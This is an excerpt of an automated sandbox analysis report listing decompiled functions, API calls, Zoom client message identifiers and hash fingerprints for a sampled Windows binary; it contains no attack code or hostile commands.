                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.Zoom.app.pt.saveFileInMeetingChat$result
                • API String ID: 3166440930-837684600
                • Opcode ID: b6faf2d7807dfd87a315f5e5da05da3d30b7c375115f39822d5885237830b2a9
                • Instruction ID: 54f5e726144fad2175a97b7f322b4de4586fb16934774190af533d20df82211d
                • Opcode Fuzzy Hash: b6faf2d7807dfd87a315f5e5da05da3d30b7c375115f39822d5885237830b2a9
                • Instruction Fuzzy Hash: 03E092B190078057C7306B155C89B1E62A4A750B16F040A2CF2065A396CBF44948D779
                Function 00C6E240 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E247
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.control.system.execute.rule.request,00009D14,Name,00000004), ref: 00C6E262
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: Name$com.zoom.app.assistant.control.system.execute.rule.request
                • API String ID: 3166440930-2398462025
                • Opcode ID: af9fc1899eb83a5bb1623d44316fecf6b3bc402b4dee34cc96df0e53f092ca68
                • Instruction ID: 60df57a4dbfc77b985a9c2bd988d43e417cfb2b8e02f10ce3be2ee9f900a1531
                • Opcode Fuzzy Hash: af9fc1899eb83a5bb1623d44316fecf6b3bc402b4dee34cc96df0e53f092ca68
                • Instruction Fuzzy Hash: E4E020B0A003C067D720FB159C49B1E67B9EB50B5AF40091DB6015F3E2CBF84844C774
                Function 00C6E3D0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E3D7
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.control.system.execute.scene.request,00009D1C,SceneID,00000004), ref: 00C6E3F2
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: SceneID$com.zoom.app.assistant.control.system.execute.scene.request
                • API String ID: 3166440930-3933472332
                • Opcode ID: 996c3f09b5a44ef3a10c8b4a2dcaa71fd5d64498eb62a8b29d9933202ac19337
                • Instruction ID: f805f9dd78ea31123627605be0beeb6941ce93a3ef5a4c666a4d4e166ed16c0c
                • Opcode Fuzzy Hash: 996c3f09b5a44ef3a10c8b4a2dcaa71fd5d64498eb62a8b29d9933202ac19337
                • Instruction Fuzzy Hash: 04E0D8B59003C1A7CB207B654C49B2E66B49B50716F00842DB6015F3D3CBF88884DF74
                Function 00C72380 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C72387
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.getcurrentuser.request,00009E7F,JsCallID,00000004), ref: 00C723A2
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: JsCallID$com.zoom.app.cci.ccivideo.getcurrentuser.request
                • API String ID: 3166440930-415347638
                • Opcode ID: c30762bfa7c86d02dcd4df734ac591baa473963cec2988c2a116f71d22e332df
                • Instruction ID: 4cbe39aa75020d6d38297723bb6a0937985d2a1879a52eb0b7205d949acef3f5
                • Opcode Fuzzy Hash: c30762bfa7c86d02dcd4df734ac591baa473963cec2988c2a116f71d22e332df
                • Instruction Fuzzy Hash: EDE0D8B0A043C0A7C710AB518C45B1FF2B4AB5071AF00841CB3055B3D2CBF44884CF75
                Function 00C6A3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6A3A7
                • ??0?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.UpdateOpFlags,000027E0,Flags,00000004), ref: 00C6A3C2
                  • Part of subcall function 00C5D270: __EH_prolog3.LIBCMT ref: 00C5D277
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: Flags$com.zoom.app.UpdateOpFlags
                • API String ID: 3166440930-1776100906
                • Opcode ID: 9bc7d799cfab2c907019e8fd62258ea94bc08723d5f610786ac623a0d2e5e692
                • Instruction ID: 008bc70bfec655ec8d7cf052b3abdee983644d81c15eb6a6d629ed4498f568fe
                • Opcode Fuzzy Hash: 9bc7d799cfab2c907019e8fd62258ea94bc08723d5f610786ac623a0d2e5e692
                • Instruction Fuzzy Hash: E7E0D8B160038067CB207B119C96B5E76B4AB40755F40446CB2015B3E1CBF44944DF79
                Function 00C72320 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C72327
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.endvideo.request,00009E74,EndType,00000004), ref: 00C72342
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: EndType$com.zoom.app.cci.ccivideo.endvideo.request
                • API String ID: 4281283084-3168054736
                • Opcode ID: a4133a7bd596702f4d734bbb9594a7f46a6b50e699f2cfdc201ff43313f494f7
                • Instruction ID: 16ebef907b76bdd7aecedca300ea1cd90b21af9ca89768474b5e622fb2944dc5
                • Opcode Fuzzy Hash: a4133a7bd596702f4d734bbb9594a7f46a6b50e699f2cfdc201ff43313f494f7
                • Instruction Fuzzy Hash: A3E0D8B1A10384A7D710BB11CC45B2F66A8E740729F444428B24D5B3D2CFF54940DFB4
                Function 00C704D0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C704D7
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.sip.virtual.audio.device.error.notification,00009CF7,deviceGUID,00000004), ref: 00C704F2
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.app.assistant.sip.virtual.audio.device.error.notification$deviceGUID
                • API String ID: 4281283084-3974739742
                • Opcode ID: 570480d328ae47b25af2e903a00646912e25d1bc54cf595b8bb6178b07b4d34f
                • Instruction ID: 7a68a4510dbdc624df631bd34bef86bcabc44a46466ef1b0d06194828cb40d65
                • Opcode Fuzzy Hash: 570480d328ae47b25af2e903a00646912e25d1bc54cf595b8bb6178b07b4d34f
                • Instruction Fuzzy Hash: 5FE0D870A00394A7E710BB149C89B2E36A4A740719F90443DB1445B382CFF44840DB78
                Function 00C6E4F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E4F7
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.control.system.scenes.prepared.notify,00009D1D,Json,00000004), ref: 00C6E512
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
